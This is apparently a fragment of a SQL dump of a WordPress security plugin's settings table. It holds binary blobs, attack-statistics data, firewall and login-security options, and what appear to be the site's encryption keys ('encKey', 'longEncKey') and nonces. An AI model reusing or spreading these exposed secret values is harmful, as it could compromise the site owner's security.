�aʩ�D\05SS�-��*�^Ӆ�\\w����%`0����vl���\r���\n?�4ɿ�r֍�O�n��_4�`�/�-�\'��aYI|6���`Z�4��\n��\"��l\'��U8y�kSl�صA��(GL��8!��<z�Kr�i��ImV�e(iCx��/?���O���E�q���i7A:�3\r�����:�?��2=�,�+)�̻��n�g���3�(���D���a�!_y���	�Q�VGK��҂��sv@��N����\0�}A�v���A��$�=�08Q�j���V\\��P�[�pHa�F~yQ�ˊ������r���`��\Z���9�8Ra>r�Z��!�e%��d�uH/l+��ޠ�����.��I6��(�웎y�R�j�\nM����x\r.s�΂�����&쮝���y���Y#�dz�E	��92���������vnjs,_Y{\Zk��]�ٛz�J�^z���{�M����9l+:A��}0��0��.�@L��3�l囔�\\�Hiܵx�f�Ll#@Ť��e+�׹=����So\nhѱ�ً!J~ẞ�ǡɹ�Ὑ�g\r��y�uCx��;P{��k����yM��#�h�.���?��t#ɠ���\"���z)`��RI+�_#a�p[o��|\'�:@���A���} E��饬2,��)���w_�DʉԶ�͂���6j4�0F��Sc�\"��~��G8<\'���������:��M�6���/�U�9)�O������WT��>����S��0\0�;��QO�%$K�	���\'��͕{)��_���ĝ�#/q�&�O�[���O�\"²�,���l?2j&�����,�k����$t3��?iYϲYڷO��5]I��{�������ٚ�X�L�l����#,\n�W�Mb��X��zp)\'�F��{��Pniq��9�o��̳l5�y9�Mb�&�iK��ues�<%�qѬ6�I���F�_��\'Q�7�3#5XN��xL+�֖}	gTj��,�)0f������;7p>�Dy(�-s\'���#֛X�މ�Ά�>�풏�9�F�ܐ𱐠�d���ְH]@e�Pa�y�ŝ&)ԧ��0�x)/�mۅ�r�Uz�������&���[j�}wR�E����v�����{�A���G�5�F�i	�y*dq]�O��X=�ܞ“�W[B�\rDݬ����v�p���>��j*���욬�e�3�p�]�L��}�`��`��DX1���ع��WJ���]cƈf�	u�J0f�j\0ց�s��ZR�~�]���*����\"�rd��S�2�!�{�֣:=�Nz����g�&��$�F,�lK급/Í9�z�Üu��\Z\"�dm�*\Z���X�͹[I|�4r�_�xS����*t����^�&��/�\\$����r\\`ʳa���7%��eűCS6���ǀ�h�2.^W�w��H�î4����n�~2p{wq\Z.(�W�a�_N��C���n�d,y�p��U�~���2ʩ��w�:���jU�/��t#L���\"u�t��P�w\"��L�x|�(.ay�ѫu�#\Z�ڄe���u��uI�;o���,1�{��[rѸ5�b�,���B2��+Y�GH�Q�M��p+��i��2�vC����m��*�i���QLC�H8�RvJ��j��o���޼f2RFt���	{[O��b�4���?���fs^�Y��\0�������^���x�{��N�0Gu�D/�S���ā����;��%�mp2X[�j_aG�����v�@�2��b\\��\0����~*J�jT�\Zw�?/�c�g��)e�����Z~&�q��N7�� Z-�����r��$E�\Z3b\n���NyoH�N�mQ��va�N�/	�Y�!v�46]3�]��3�<���ڗ���<�*=�t󅡢pE�KL����[�Mrx%\0�b0qq�Ă��|x����:��_��V�5:�U��S�o2ҾP�u�A_�*}�~��\'K9�;�4��p���\n+=U�O�}��6Ԋ|���}<yﭼ։K�hxޫ(R���1�=~�P�w���ºT�+�In��\r{��M��_�໘`3x���4��L�#\\r��ԹF� \"�$q�c�@\n��C��KnA��O] �`�o���C��K�����.���U8u���i���H<pSh�Zذ/�\r.�O�}9�fP�k���o��2,�=A}P��#\r5�k��,P�D�+�>J��5딧�n���.\0U�Rq�k\'�����i_i,�\n�G��+L�.\rQ�\0��%�\'�y�m�_��#�?���E1\0�² �7��5mw>Z��2Q2K=�^N����q����Q\n�IS�}V#�N7=��ɷ�5���gD��>h]3��\n�0_�э�Wg��1*�V�����FIP���x��f�vL�@���p����R;K�����R��[:[��*w�(�1�� y��jL3ˇ�d�\'��V&}l��]dO��g��V��:���5��fH��A~l!�/�6�yԶ��!��[^�I�ٷO3��E�}{��Y�z������#���@���XaͰ]��()c�k��!~s�~h���q0���X?8�̅���H��i,+x��͵�SE��9�r=�#_~�\\�/Sͻ�(YC/#/�D��^>�6\\����V�6 E�i�*�X,��/�6������}%]�v�	��\ZY����<�}]�8�c��4=}�X�j(	;��w�g�ָ,\\R�0�$k�o�A��{������2#�am��\'��Y#��O��(&\r\n0�{z����7�j����R�v���^0�?�2Dh�4�SG�8RH�e���4ډ3�z\Zr�K,�Iޗ�Oe�x�џ��i}��.��kQ�_�3��9�y\n�b�-5c,R����3���\'�r��.]9c�x��ߚY9�\\~������f���Ƕh�j}u�pIX�p�ھΩT����/�6�F���k�T�E�;�H	#�ߛ���{�C\'Vۨ/��H_n{��FW��?^ծ�V��� �N	��-���j���s\Zjh߽C�ș�I��E�R���1��G�Ÿċ��d/8��Z{{�S�*Q�b�U�a����9e׽R��X�?楐�1���ih\Z�ҕ��X�T�9�����Eߎ�i��ц	�v���&�=G���V�kr2��C5����m��~q~���;rfXᅸ��eX�t�Ū.+[�����咩H{v���./s|U�Z��A�h$DU�s����I�{\'\01�������r���k��D����a�c���#k�Qbm(��(��{ia^�\\v�J��M��C�`QA6�_�~�j�c�,1��F\n)7��䩾!�@���	�n���K^$��N�Vj���q��`J�BZ�ޅ�J���X�0u�9�>�!��v1����v��ą�>���Ш�&�D�6X]`��=�s\0��1�y5z���4�O�š|p�A5�P���(fy���2��Э�9��ex�kz�B��4��6�Hy�/=��u4�_c���	ο\'���M|4��gE;+\\�)H�q��{�@�dX{a2�H�=���G��6Cm��:�|��!%��p8�Ug𿌫��A�N��y�qoʅ#&]�#mV�ە�rȹ���L�=��6m�zQh��Z������C�� ���T�α���i��ߠPom\\D5~�!�������o��a[�ce�U�>T��ø�~3��$:�З���e���W�_6|�T-�>{�rC\n�=���k��Rd�j��6���T������\'����3H�_cx��N���pn��x{V���@��f!��D.S��J/�xk�nZ�~q��6Lꂨ$����?{II%�&���V(Aw��<䩻���c�$�a�=�����!3C�PY��.c%�0b?O�)Mퟴ����[�%>xd�]?Z�񴝞1����5���q�)��9W/`��kW�V*�_i_\'h�Ma�CQW�~K�0�X~D�<���>�5�O!	U\'���IaӴ9+���6��fF��7�r,��?��O�P��\Z�r�(ga�u;Y�R�>�v\\��?s�k�\\� �~�m���V��|ݐ�\0��!��ٖX6���a�v�/%1U�Ed��_w\'�ޢ���KGs�*<v�u.������S��A`\n�	t���p\'��\\ˑ+&�*u4��c	\Z{\r�������@l(2�u���-V�����Jˀ��z�ا`*#��j�xZ��&�\Z�{C\rB�]���Y�#�<\0!_�M~(�����k��_�M��W��F�i�]������iˍ��B��l@��j�!�\0@�����Ų�3����pv`�r9H��(�c�WޏK\"�$��G�ϭ\'�6�I�\"�V�ɜ=��0������\Z����h݆֭<e1L�!ӳ��\Z��D�K��i��@*S�ĘRg���	r���z�2,o��Q���ϕ�FU���lt��*�g����V☲ù�����۬��Bj�LN��hZ��e%�D\'��G}w���E�k*	��W،j��|���K\'��l�Ȉ<������fdU�Ƭ����\\�fH���v��I�I��w�d�4\"�醗����0_��h�^1���-�c�j�Htfݬ�?���D)�\'��hcF,�4�|i�Ql�p��t�>�%y����1P�bB��R�����[B}�\n[���;	I2q�U�>�n)̈́��Ix��VV$��Z=��q�UO���c����\n���4�\r\'R�2�8�F(>F�2 ����\"Qj6�h��\'�Vh��~��Ad���7��D�c���A�\Z�H�zy�I����Q�]�o��%<��DN�N��M�^�^��/jC9�tb��p�\r<�!!d�e�p��\Z�	�0mz�����%�\ZN���:�J0��L��2��\"L��⯜t�%>��:1��W��R����ͩ��Q�i��~�^G�vr�`G�̃�S������$ �2|��>��Y�wM�W[�� ��I��/�H-j\r%�D��������+�P4�g.���{���^W��/!u����T �&gɖ�\r.��:�)�Q��7�ݣ� �h��\"b�Y(V��W�|/5[�r�ɷ*���M���l���r�n��zW��m:f�O&y(�H������\n�#_F�D:���1I�}U\"\0H�B�&`�8��m��!U�c%rT����.��q�x���=\0���\"�I�8c�_�;�k�6��R�r��E?{d���G_�A���7����c0+��^E��h1��{��9U�,���%k1X�\r Lc�N�;�<K�{�*�k�L������E,�t*�J�.	���*歁\\5��c�%�a��P�T��g�xȻ�=��|@� ԃ��\\��HVq2��v5�o��,�\0�7�IѴ�E�����90.BAe�4>�]y�S�Pk��=�9i��fCu	l6E�#�Zt,#<�\ZL�4Z���FU����!}\\֊��_ȕ��o�/B�\\!�Z<&�^�S���V�?���R�Ê�]��	���ͮ6���R��Ԥz��8�\\4��w��c���y����s���M�)9@����2���.���V�/B��c5a��\rRI�G>?���y;�+�����\'�SAE�D>����qqa�_��؈K)�A��/��YQ��;�#�6�yc�Ȍ�ʗ�j���L�2��-[� 3���]S���.��\\��0ה��B/\n�j�z\'a�����������F�L\Z�H-L	`$p1/>:r���V�Ǚ=={��Or�R�xg�J9G0>z�c&�IÆb4~�*L�Q�Rkg!i��f�nb.*��η���$�gw�T��#;?��`�?��;\"��A�Y|���X;u�a�w?oa���bN$��gI���+���R.�e�\Z����pt��ᣈ��:\Z�`\'8�y`���w�W�0���P��R�Ƈ��]�P�d��$*H��9\n?�g{��gs�	gO��X�I�#n���!F#Yȼv\"|�:�ݯCG#\nY�E[��V�w��i�%�-%F�\0��[�n�1S�a���+���]��B�E2�s�Ŏ)�?ԟ��B�	�*�Z�O��ےn+�z�`ߗ��]�^��$�d�g��Gf���m�G8�@~n��?�	x��*Ցx�k��S��략9�����U�R�ݼ\"�EI� {�`z��$��쨀q���Z6hֲC��R=�8H��ΐ��<���>�y��y�=� �؃��G��ө&����0��*����u�\0u�\r��+M\nMƿ�4��f�_�MG���%2q��0�/ғ:;��e�W�G��ʈ�P��,�K��A]H��%����A��Q�D�۞V蚹xRBBy%�h�Wv��Ƕm�}n�G>p��ѹ��W�����5�w���O�E�̾�m�G��. Ճ�g��?ƒ�r�Тjs$_�D&֗��H��᝭s%��v�x-���#����?	���T���5�)�\\Np�����[��>��&��]����:���.�ѥׇ���4���U���hnl���h��ʫ�jF�**\Z���W�nfrP#3�w֢$����¡桘3���D�\\�[�I�����wD�=O$l\Z�����I��9<��0ox�>��L1��\Z?���f�]��t2Ј���5�����I�v��C�(�߱wzi��C\038�\'U���$�S��(�]4�P�����cU�v�᢭�(�c�̈́ɯ�Tνڐ$_����S����Њ�|��|���n��D��~��v-�;&���W�0��;����7�\"�L~ޅ�LE�`!�)l�ʛ�hL��O�/̩3��z4�Κ�C:Ufz^^Gn����/�pR1�C�̬20�2�J�΍<��:�_��B!s*���l���6���\"Q_�ȹ�2���a7��<\\U}�\"A���s��?��C9����`�r���0É�����\0��1��y�i�N7,N]�8�Ϫ��������C�,01�Sͭ�-�a��b���pY�x{Vc�o��lNG�qlkb�����a��ñԟ�yb��@�Y���(J5}׸d�t`Mu���Ƃ�Uz[�w\\=ʼ\0[\nK�ix�-b>��,E�d�Ҕ�\nN�-���\0�9�pM0+��~0��:6r½c��	��h{�M\\����J��,�k\r?��O\Z/ކf���?�xȃ9��\rQP@\r��\Z���S�z�\n��E�O����wF.P��)n>��<���W��S)���_�]����Y�a�\'kY����_ot�r�)��C����E�I�m/�;����g�g�ŭ��Ʊ��0`���8^���\\��Ƌ�~���~�J��7$kSsYme(�|��.��ŹzZ��[����몾l�c�읋���q�oן���K�֛+���%�؂�!a�29\n����`�F_h��*�y��.�Z�ۭP�0��\"��j����=xat\\K��h���9����wǏ���;Z)���K�~���Q�[::��j�s���^Z@2n��ve)e_��u���!�9�]�we<���΁�iJkN���uM��ٍ��O�I0x{M�y�R\r�~��S���BST����h�Zs�*����[?	PO��v��DŌi*�b���*�;ةD�ڨ�n�/N����sh�w��k1]�\':�&e�t��b�t��*�\n\'�Z%��$^���*�B��R_~�;A���k8����\\=�>J����1�~(���Ac�q�o%TF�O-�Gz�JTN>�\'����#.�D�=����a�:��\'j�K�� WHS����`\r�y~E�~|�\nR�i)fl�饔e}�)ld�*�ÀI�F�^��ȯ�ܒ��W���@�~�ݘ�T�`�l�� �9��睪P�k�KV��d��*�X\0M�o��DO=h�W��\0 �7$����R�T�b��z�Hp�f��?�@јݲ�I�����G�]�q�M;��>l\nA���>��k�h���R���8�yO��t�ld�U�^��E�%O��n޹�~}���J[�An>���P:�����7��4iw����q��c�s� @�\"/��š|sP|0��ô����!�J��[h7e�^�J��T�u�V��څ�6���bJ�R�#��Բ�Yu�n�nO�������#�\r�F1_Ң\'�Sz�<�J8�@�b��c�\niz�N�y׊��}˜.��\Z�^�����*�̶=������.�)~��	�_OP�\n�x+��U��1�w��z�)�\"4�+�B\\���II�%�%�\"ЖX����~X4;;�]*�	�&���\"T�QWvRi��d�3�m�`a��3\r�45q$�&Β9QO*z�kB�������jdE,�Tg�OrP~�tgn�g���(�W�{v����^�Z��}ȐC6ݞ��+�?�۸Z�P�d?P�\\����kO��}H�\"F�+:̵LZ�KA�x����r�^/���\'�D�~�4�d���`8`q��׆dŪC*�k]�0ɾ\"���Ͷ#8K���r���|\Z�ゐ5�b�T2���ph=��������j�#�jR����	𪏨�|�z��03��ܸOV1�SlfwV��1	��l?��.\r��ƨ�;p���-�e*���`���[�p5U���ͳ���{���n���!z[�>�f�t4����s^�tE+W�L�կ��C��ҩχH�h�Z;P��.����s.��1��q�+܋\r�4�$Pd�uU1����8���<Kn�s���p�GR�b�:L��0�j}�y�슟W���Sh�5GH�;�V��(��(�\ZB\0�\r�lŗ���B�s�#3�?+��Wp�P�M�k]�<px_�\"R�Lki��G�Ap�\Z\\���?h��8���Q��$�d1��ˌ�GPP�(�Ϟ���S��3Q�?(H|,�;p��H@yƄ��k}�{��[��W{�LG�.�vOǫ�\"�M\r6Ic�����E��,M+,�ǖ��f�� �MP�[�Y&���\r��,���YDx��x����Vތ�\Z��~�VD���Z6�aW�_�tʩk�g�i\n�B�_��[�\0��7��4�w5���q��y����1�Щ3�&�Tt�ȹ��8��=��S�P�y�Ym���m��U�I���O�F	!������q��O�~þ`��Ϸ7�i.K���K�����;��3@��\"��_���d�/5�������%����9�U6>��Nc�V�M�Tp�W \r0�����Z|�\\�T�-��B�D\"�,Q�uܳ��n�����.������A\Z��X�m,��P\r�J�h��x�Q#��\0��tg���F���N���v��&�W\"�IJ�}:���k�S�-e&s�c��1h�ؗ]m3ĺXq�Ï��j�_�y�[+x�E��V0z���xi���\n���F�\n��7��4�欋\\�M�=���O����h������L;�-��F��\0��U��*/����d�.>z_�ME�MՏ-/v��_څc����?,U&��\"��R�[�R����|L���<uQR�V����x�s��	b[�y�i�C��\0����T�q@W~��{�Ṝg�IU9�\0���ڡSw�q�\\(LpR^��_m�o�<e��{�FE�P\n-����,5H��:��@���\r�%��-�����,$y��k�\\�3�딢ߓ{�B2�A����G�<��&%���߼w$���c�TV¶\r�|f�7hC�p\Z��8�w�G�+�dUx��Xc�ѨV�*�6�i(���H�Xw�6[�|�Ja�ʹ�Ж�q^����O�h;xA�3�-\r���hM�>kv7��[���ׇd�̂zR<��2���K�����7�I���I�!1&�j��[6����56i�8��n�t��l�*���?���/]�\Z�4�tX�*���5��2�.p�·�\"�F�6Zؙ\n��$z��z��\r�9`\\&S9�~{-LKŝI�T�i��;�u!���7�U�e�H> -��%G��(�m�\0���DO;��^�K��l����ظ!�/?aF�z��#�U�%f��{�x��i�<��f��;������K�Z9ްN��Wj_�H�]�͚V�I�R[냛�B�w�s��bN}�qY��7zo�U��u�\'���1��k���~P,o���ʂ-~�Bʾ�i>1�/#���#��y��X�oa��\\D�Şheb������h��?)�3��1�u��s��_s�Шd��>V�*R��/\0�����ӷ�~r�%�\"������8lb�κ��\"�7e�E�=n~��͙\'2�C/�����r�\r�̈�\r�;�J�U�ˑ-�\\B��?��	C�Q���c2 G������e��h��h��݌^�@�˶\\},n���ۛ~A�F�,���{�<n�н�>!��2��_U�d~��p��7O\";}XFK��\0','no'),('currentCronKey','','yes'),('dashboardData','a:4:{s:9:\"generated\";i:1624620355;s:3:\"tdf\";a:3:{s:9:\"community\";i:3990;s:7:\"premium\";i:4120;s:9:\"blacklist\";i:18545;}s:10:\"attackdata\";a:3:{s:3:\"24h\";a:24:{i:0;a:2:{s:1:\"t\";i:1624532400;s:1:\"c\";i:16514000;}i:1;a:2:{s:1:\"t\";i:1624536000;s:1:\"c\";i:16302409;}i:2;a:2:{s:1:\"t\";i:1624539600;s:1:\"c\";i:15875739;}i:3;a:2:{s:1:\"t\";i:1624543200;s:1:\"c\";i:18222581;}i:4;a:2:{s:1:\"t\";i:1624546800;s:1:\"c\";i:15924360;}i:5;a:2:{s:1:\"t\";i:1624550400;s:1:\"c\";i:15504084;}i:6;a:2:{s:1:\"t\";i:1624554000;s:1:\"c\";i:15656895;}i:7;a:2:{s:1:\"t\";i:1624557600;s:1:\"c\";i:15393092;}i:8;a:2:{s:1:\"t\";i:1624561200;s:1:\"c\";i:15354579;}i:9;a:2:{s:1:\"t\";i:1624564800;s:1:\"c\";i:15467779;}i:10;a:2:{s:1:\"t\";i:1624568400;s:1:\"c\";i:16085396;}i:11;a:2:{s:1:\"t\";i:1624572000;s:1:\"c\";i:16557920;}i:12;a:2:{s:1:\"t\";i:1624575600;s:1:\"c\";i:16233569;}i:13;a:2:{s:1:\"t\";i:1624579200;s:1:\"c\";i:15333432;}i:14;a:2:{s:1:\"t\";i:1624582800;s:1:\"c\";i:15537018;}i:15;a:2:{s:1:\"t\";i:1624586400;s:1:\"c\";i:15804649;}i:16;a:2:{s:1:\"t\";i:1624590000;s:1:\"c\";i:15145063;}i:17;a:2:{s:1:\"t\";i:1624593600;s:1:\"c\";i:16664267;}i:18;a:2:{s:1:\"t\";i:1624597200;s:1:\"c\";i:17043836;}i:19;a:2:{s:1:\"t\";i:1624600800;s:1:\"c\";i:16363846;}i:20;a:2:{s:1:\"t\";i:1624604400;s:1:\"c\";i:15447583;}i:21;a:2:{s:1:\"t\";i:1624608000;s:1:\"c\";i:13923619;}i:22;a:2:{s:1:\"t\";i:1624611600;s:1:\"c\";i:12914042;}i:23;a:2:{s:1:\"t\";i:1624615200;s:1:\"c\";i:12611259;}}s:2:\"7d\";a:7:{i:0;a:2:{s:1:\"t\";i:1623974400;s:1:\"c\";i:394278295;}i:1;a:2:{s:1:\"t\";i:1624060800;s:1:\"c\";i:382944032;}i:2;a:2:{s:1:\"t\";i:1624147200;s:1:\"c\";i:361452346;}i:3;a:2:{s:1:\"t\";i:1624233600;s:1:\"c\";i:335802064;}i:4;a:2:{s:1:\"t\";i:1624320000;s:1:\"c\";i:335139427;}i:5;a:2:{s:1:\"t\";i:1624406400;s:1:\"c\";i:390858375;}i:6;a:2:{s:1:\"t\";i:1624492800;s:1:\"c\";i:386661636;}}s:3:\"30d\";a:30:{i:0;a:2:{s:1:\"t\";i:1621987200;s:1:\"c\";i:286905640;}i:1;a:2:{s:1:\"t\";i:1622073600;s:1:\"c\";i:333904118;}i:2;a:2:{s:1:\"t\";i:1622160000;s:1:\"c\";i:318334101;}i:3;a:2:{s:1:\"t\";i:1622246400;s:1:\"c\";i:312780971;}i:4;a:2:{s:1:\"t\";i:1622332800;s:1:\"c\";i:372598252;}i:5;a:2:{s:1:\"t\";i:1622419200;s:1:\"c\";i:356398138;}i:6;a:2:{s:1:\"t\";i:1622505600;s:1:\"c\";i:359044354;}i:7;a:2:{s:1:\"t\";i:1622592000;s:1:\"c\";i:396293020;}i:8;a:2:{s:1:\"t\";i:1622678400;s:1:\"c\";i:422656045;}i:9;a:2:{s:1:\"t\";i:1622764800;s:1:\"c\";i:394477219;}i:10;a:2:{s:1:\"t\";i:1622851200;s:1:\"c\";i:367379297;}i:11;a:2:{s:1:\"t\";i:1622937600;s:1:\"c\";i:375159355;}i:12;a:2:{s:1:\"t\";i:1623024000;s:1:\"c\";i:400976179;}i:13;a:2:{s:1:\"t\";i:1623110400;s:1:\"c\";i:410377013;}i:14;a:2:{s:1:\"t\";i:1623196800;s:1:\"c\";i:391850657;}i:15;a:2:{s:1:\"t\";i:1623283200;s:1:\"c\";i:372351456;}i:16;a:2:{s:1:\"t\";i:1623369600;s:1:\"c\";i:339391991;}i:17;a:2:{s:1:\"t\";i:1623456000;s:1:\"c\";i:333596198;}i:18;a:2:{s:1:\"t\";i:1623542400;s:1:\"c\";i:327425584;}i:19;a:2:{s:1:\"t\";i:1623628800;s:1:\"c\";i:338422353;}i:20;a:2:{s:1:\"t\";i:1623715200;s:1:\"c\";i:368877649;}i:21;a:2:{s:1:\"t\";i:1623801600;s:1:\"c\";i:356476582;}i:22;a:2:{s:1:\"t\";i:1623888000;s:1:\"c\";i:375994198;}i:23;a:2:{s:1:\"t\";i:1623974400;s:1:\"c\";i:394278295;}i:24;a:2:{s:1:\"t\";i:1624060800;s:1:\"c\";i:382944032;}i:25;a:2:{s:1:\"t\";i:1624147200;s:1:\"c\";i:361452346;}i:26;a:2:{s:1:\"t\";i:1624233600;s:1:\"c\";i:335802064;}i:27;a:2:{s:1:\"t\";i:1624320000;s:1:\"c\";i:335139427;}i:28;a:2:{s:1:\"t\";i:1624406400;s:1:\"c\";i:390858375;}i:29;a:2:{s:1:\"t\";i:1624492800;s:1:\"c\";i:386661636;}}}s:9:\"countries\";a:1:{s:2:\"7d\";a:10:{i:0;a:2:{s:2:\"cd\";s:2:\"US\";s:2:\"ct\";i:1202563561;}i:1;a:2:{s:2:\"cd\";s:2:\"DE\";s:2:\"ct\";i:306720148;}i:2;a:2:{s:2:\"cd\";s:2:\"IN\";s:2:\"ct\";i:287958924;}i:3;a:2:{s:2:\"cd\";s:2:\"FR\";s:2:\"ct\";i:249053126;}i:4;a:2:{s:2:\"cd\";s:2:\"SG\";s:2:\"ct\";i:183401500;}i:5;a:2:{s:2:\"cd\";s:2:\"CN\";s:2:\"ct\";i:179097520;}i:6;a:2:{s:2:\"cd\";s:2:\"RU\";s:2:\"ct\";i:163451407;}i:7;a:2:{s:2:\"cd\";s:2:\"GB\";s:2:\"ct\";i:147863140;}i:8;a:2:{s:2:\"cd\";s:2:\"CA\";s:2:\"ct\";i:143576308;}i:9;a:2:{s:2:\"cd\";s:2:\"BR\";s:2:\"ct\";i:127025202;}}}}','yes'),('dbTest','a:1:{s:5:\"nonce\";s:64:\"9a752b13cecff46024b3c909b9950fb3cf20c24129ee7001435beaf98fd4ab64\";}','no'),('dbVersion','10.5.8-MariaDB-1:10.5.8+maria~focal','yes'),('debugOn','0','yes'),('deleteTablesOnDeact','0','yes'),('detectProxyNextCheck','1624966046','no'),('detectProxyNonce','f30cf11d6ab7061e8a273ced12408c4e152908affc246ef65a16c3da16010856','no'),('detectProxyRecommendation','DEFERRED','no'),('diagnosticsWflogsRemovalHistory','[]','no'),('disableCodeExecutionUploads','0','yes'),('disableConfigCaching','0','yes'),('disableWAFIPBlocking','0','yes'),('dismissAutoPrependNotice','0','yes'),('displayAutomaticBlocks','1','yes'),('displayTopLevelBlocking','0','yes'),('displayTopLevelLiveTraffic','0','yes'),('displayTopLevelOptions','1','yes'),('emailedIssuesList','a:0:{}','yes'),('email_summary_dashboard_widget_enabled','1','yes'),('email_summary_enabled','1','yes'),('email_summary_excluded_directories','wp-content/cache,wp-content/wflogs','yes'),('email_summary_interval','weekly','yes'),('encKey','19b4031a95a7983c','yes'),('fileContentsGSB6315Migration','1','yes'),('firewallEnabled','1','yes'),('geoIPVersionHash','e5ee69a4db1e318c2a1668873a8f5074012abb9852f5596fe3feaa8c07dac334','yes'),('howGetIPs','','yes'),('howGetIPs_trusted_proxies','','yes'),('isPaid','','yes'),('keyType','free','yes'),('lastAttackDataSendId','320','yes'),('lastAttackDataSendTime','1624454791.517300','yes'),('lastBlockAggregation','1624534386','yes'),('lastDailyCron','1624620595','yes'),('lastDashboardCheck','1624620596','yes'),('lastNotificationID','16','no'),('lastPermissionsTemplateCheck','1631605535','yes'),('lastScanCompleted','ok','yes'),('lastScanFailureType','','yes'),('lastScheduledScanStart','1624416673','yes'),('liveActivityPauseEnabled','1','yes'),('liveTrafficEnabled','0','yes'),('liveTraf_displayExpandedRecords','0','no'),('liveTraf_ignoreIPs','','yes'),('liveTraf_ignorePublishers','1','yes'),('liveTraf_ignoreUA','','yes'),('liveTraf_ignoreUsers','','yes'),('liveTraf_maxAge','30','yes'),('liveTraf_maxRows','2000','yes'),('loginSecurityEnabled','1','yes'),('loginSec_blockAdminReg','1','yes'),('loginSec_breachPasswds','admins','yes'),('loginSec_breachPasswds_enabled','1','yes'),('loginSec_countFailMins','240','yes'),('loginSec_disableApplicationPasswords','1','yes'),('loginSec_disableAuthorScan','1','yes'),('loginSec_disableOEmbedAuthor','0','yes'),('loginSec_enableSeparateTwoFactor','','yes'),('loginSec_lockInvalidUsers','0','yes'),('loginSec_lockoutMins','240','yes'),('loginSec_maskLoginErrors','1','yes'),('loginSec_maxFailures','20','yes'),('loginSec_maxForgotPasswd','20','yes'),('loginSec_requireAdminTwoFactor','0','yes'),('loginSec_strongPasswds','pubs','yes'),('loginSec_strongPasswds_enabled','1','yes'),('loginSec_userBlacklist','','yes'),('longEncKey','6d5251232a701eba4895ecdb21444f85d032e4f9167b4d48cb7a1e7a034bc336','yes'),('lowResourceScansEnabled','0','yes'),('lowResourceScanWaitStep','','yes'),('malwarePrefixes','�\0\0\0\0\0\0�y8�\0�ٗ�Ν;˽sIYJ��BR$RI%Q�D�ZHJ!I+�J��H����i!*)�EE+�&~����y�y��3��3>�nj�\no>^��\'�_wB�x�1�uO�\Z� �%�e\r�?�EC��)���M�>��8)��}��uׄ�-X����1ff��m\0��\0��\0�r�a?\0xG7\0?��)��`��\0�4��D�K@�bH�\0Y�+ gZ\0�p\Z������\0��@1�Pt���180�\0�v6���. �);����ռ\Z@U�	��{\0u���\'�����@p_���F��\\q4��\0Z.=���_��\r0h�����t&�:A��!��\0]�߀�\n@7�\0��b?�g��]����;�a�l`�,[�0�`��`x�,0�`00��a����$`d�0Z�U\\\0�>��K>��&�)���/��S5��)�;0����r��=	��7�?�����`\\C`9��*XXՐ���d`��~`�6L�XK�֗_�W�6$`�����t��t/�<$p�8�7�O�\0��`�m0m��.V!����kH,�\Z����H�f�~�x8�9�����u��6~����\\����\\�`��w�<�:`^s0��\0,?\0,H{\r,8�,(N\0\\Y\0,��x,�x�\0�cO�Ӏg�#`��-��u७xx�s��/�]�\0,�%|����l���0��,���Y���g�8`����р�����]���C��\'v\0�k܀\0�& `O,�:	X��&\"@`�H h�4 8Z��܁��s`��I�\Z0XӺٛ�A@XPv�/6\"�J b�\Z \"k\0X���:��\0����Q �U5d��DG]\06=]ln��X�[V�@�.�E�����$��������.�-�ض�,��; ~�j >��N�u灄��@B�#�8�H�7H|;؁.v����+�$� i�?�s� �+\n��	؍,v4{���f7�g�o`��>�w`��^`_�N`��R<�)A��=��q���R M�6�f0\nH�/\02�K�g; �c\"�9P�0%k��Ӣ���@��D g�= �3pdQ!p��4p�Y�����@�zs �����p�N\Z�\n��t_�T�p�[B�@��I�p�m���\Z��=(��n��1\Z�Y\Z{���{%\'F�|�\0�*^�&�������)���@��(�2(OR���˧���w&W��\0��`��m=P�2��@��k@�F�:�P}��|���7:������S�����[9Z�]�r�ә\0�5G�f6\0�|�}E$p��@�x�xx8�2���/��4h�txt��8S4�π�cÀ�Q��G������^@��6�y� �<xaj��\rxi9x9Y	��^���^Kږ�m�b൷=�:$x�1x;r�)Юc��\r���	|hK:�́O|�ϻu�/���o�����]��#�[�?�@��@�����=��\r��_��Ǿ��U�����7c\"�oN)0��K��K 4M��?�Ч� |�c�@ĺD���h�-�/1\'��q�ĝ��x��x6$/�E�.���8(Z;]�ˢ@��@k@��$P2�����[߀2�hP�u:H�D�T�3���@f�\'�{�� G��ܺP��\0U�AUR\0���������~P-�E���n8��Uj饁Z��Z�|A��M��~!��Uj?�j?{*�\r���:��A��-��vpp�)8D��W�Z;�������@W��h��84-zq	8l�0�p�4�N\r_[���\r�p?8�X����\Z}M\0�]A��;A��	����@�8����.8\Z\\��}�Z����� м��{*gp�b8��\0h9v>h��h�5����JN\0�����@k�h��\rh}��������lmN^m�A�oE��/�@;�~��U8i�?�>&��/\'?O\0�|D@�@\'pZ���z!�<�8=�]#~�3g�3�G�35\r��+G�Y�n�n����_A�����!8��X����yE������������\r�$%�!o=��=Ꟁ���g��p�\0��/��y�h�ApQ�\Z�K���:R.��.���n���烾��K=��G��K�T�k���e�W�d�+�OW|��7]W>����G0آ��4W]\0W�X	���{0���?^��X�uǀ�#߂�������!��M��u+>����o��Q>���3��F�4���\0�^5	�>�	F>n���\\]�< ��\r\np��Lp��+��Vf=�u�7�m�2p[�Wpۉ}�\'0nb�����\0����I�`’,p;�Ll��6��G��X)���&��\n&�?w}H����{{������=\0�߯�*S�x��-��e�`ڑ+`�r0�\r�>hxp�D0�[=���*p灇�^\0�R�lU�ݞ\0�\0s���1��c/����U`�\"3�8_R\n��̛�\0�5�������12� y6X��,��<�x��9���*XX�,��`�3%O���M�Y+s�<�&<��\r,60K�@��0<��0lX��e�3��J�B��0�+�.+�g������)7�gxy�E��\\��H��+��FE�W����o��?�E<���k�C���9u���5�����,���ޮ�o��wu�w�^�Ƹ������\'�����Р�	>\nj�\0}qw���=�`S�=�-�{(�\'o��i�$l���-#g����/����_�$�//Ԃ��+�W�?�����u\0��	�s�ߵ���z����{�^�C��ct<�1<\0�v�����m�ON�����s��ۧ�O/�� �����~�U��>}8��X	v�]�:��X\nv�{�D�{�N�?�1���b��o��2_�W�v�W���u6���\Z��#����?�࿲0����k;��W; ����47C���p� #���\n{�0\0�v�|���!�b9�.y� l����1��m#!r�\'��\Z\n��!ѼXH�%�:+!驫���[Hfɾ\\��SŐ��-D\ri���\'!���h�)1Rj/��w, ά��!�?H0�	VG!a�$��49� �wA��4_HG{��O\r��\r�t��<��{\r���˟�}����W���wo��@C��A�ܞA�|A�J�a�� Â+Ј�5��Yrh��#���\Z��\n2�%!�Fi-�F�F\'��L�4Bcd%И+ 